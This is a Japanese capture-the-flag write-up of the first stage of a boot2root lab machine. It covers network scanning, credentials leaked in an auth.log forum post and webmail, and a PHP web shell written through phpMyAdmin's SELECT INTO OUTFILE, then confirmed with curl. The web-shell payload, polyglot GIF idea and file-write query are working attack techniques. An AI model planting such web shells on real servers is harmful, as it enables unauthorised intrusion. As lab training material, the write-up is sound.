# Boot2root - Writeup 1 (初期調査〜Web侵入)

## 1. 探索と列挙 (Discovery & Enumeration)

### IPアドレスの特定
攻撃対象のネットワーク範囲をスキャンし、ターゲットのIPアドレスを特定した。

```bash
nmap -sn 100.64.0.0/22
# ターゲットIP: 100.64.1.32
```

### ポートスキャン
対象ホストに対して詳細なポートスキャンを実行した。

```bash
nmap -A -p- 100.64.1.32
```

**検出された主なオープンポート:**
*   21/tcp: FTP (vsftpd)
*   22/tcp: SSH (OpenSSH 5.9p1)
*   80/tcp: HTTP (Apache)
*   143/tcp: IMAP
*   443/tcp: HTTPS (Apache)
*   993/tcp: IMAPS

## 2. Webアプリケーション調査

### HTTP (Port 80)
ブラウザでアクセスすると "Hack me if you can" というタイトルの「Coming Soon」ページが表示されるのみ。
ディレクトリ探索ツール (`gobuster`) を使用した結果、`/forum` ディレクトリを発見したが、HTTP経由では `403 Forbidden` となりアクセスできなかった。

### HTTPS (Port 443)
HTTPS経由で以下のURLにアクセス可能であることが判明した。
*   `https://100.64.1.32/forum/` (My Little Forum 掲示板)
*   `https://100.64.1.32/phpmyadmin/` (データベース管理)
*   `https://100.64.1.32/webmail/` (SquirrelMail Webメール)

## 3. 脆弱性の発見と情報漏洩

掲示板 (`/forum`) を調査中、以下のURLにて興味深い投稿を発見した。
URL: `https://100.64.1.32/forum/index.php?id=6`

**内容:**
ユーザー `lmezard` による投稿で、サーバーの `/var/log/auth.log` の一部が貼り付けられていた。
ログを解析したところ、ユーザーがパスワード入力欄ではなくユーザー名入力欄に誤ってパスワードを入力したと思われる記録を発見した。

```text
Oct  5 08:45:29 BornToSecHackMe sshd[7547]: Failed password for invalid user !q\]Ej?*5K5cy*AJ from 161.202.39.38 port 57764 ssh2
```

**特定された認証情報:**
*   **パスワード:** `!q\]Ej?*5K5cy*AJ`
*   **関連ユーザー:** `lmezard` (投稿者)

## 4. Webサービスへの侵入

### 掲示板へのログイン
入手した情報を使用し、掲示板へのログインに成功した。
*   **ユーザー:** `lmezard`
*   **パスワード:** `!q\]Ej?*5K5cy*AJ`

ログイン後、`lmezard` のプロフィールページを確認し、以下のメールアドレスを入手した。
*   **Email:** `laurie@borntosec.net`

### WebメールへのログインとDB情報の奪取
入手したメールアドレス `laurie@borntosec.net` と上記のパスワードを使用して、`https://100.64.1.32/webmail/` (SquirrelMail) へのログインに成功した。

受信トレイを確認したところ、データベースへのアクセス情報が記載されたメールを発見した。

**メール内容:**
> Subject: DB Access
> From: qudevide@mail.borntosec.net
>
> Hey Laurie,
>
> You cant connect to the databases now. Use root/Fg-'kKXBj87E:aJ$

これにより、データベース管理用の特権アカウントを入手した。
*   **DB User:** `root`
*   **DB Password:** `Fg-'kKXBj87E:aJ$`

## 5. Web Shell の獲得 (Command Injection)

### 掲示板での画像アップロードと制限の突破
掲示板機能において、画像ファイルのアップロードを試みたが、GIF形式のファイルを含むいくつかの画像が拒否された。これは主にファイルサイズと画像サイズ (`upload_max_img_width`, `upload_max_img_height`) の制限によるものと判明。特にアバター画像のアップロードでは 80x80 ピクセルの制限があった。

この制限を回避するため、有効な GIF ファイルの構造を模倣しつつ、画像コメント部分にPHPコード (`<?php system($_GET["c"]); ?>`) を埋め込んだポリグロット GIF ファイル (`shell_avatar.gif`) を作成した。

### phpMyAdmin を利用したファイル書き込み
入手済みのデータベース `root` ユーザーの認証情報 (`root`/`Fg-'kKXBj87E:aJ$`) を使用し、`phpMyAdmin` にログイン。`SELECT ... INTO OUTFILE` 機能を利用して、Web Shell ファイルを Web サーバーがアクセス可能なディレクトリに直接書き込んだ。

```sql
SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/forum/templates_c/shell.php';
```

この操作により、`https://100.64.1.32/forum/templates_c/shell.php` に PHP Web Shell が正常に設置された。

### Web Shell の動作確認
Web Shell にアクセスし、コマンド実行が可能であることを確認した。

```bash
curl -k "https://100.64.1.32/forum/templates_c/shell.php?c=id"
```

**実行結果:**
```
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
この結果により、`www-data` ユーザーの権限で任意のコマンド実行が可能となり、**Web Shell の獲得（コマンドインジェクション成功）** が確認された。

---
**次のステップ:**
`www-data` ユーザーの権限から、さらに上位の特権（`ft_root` や `root` など）を奪取するための情報を収集する。カーネルの既知の脆弱性（Dirty COW など）や、他のユーザーのファイルからパスワードや秘密鍵などを発見することを目指す。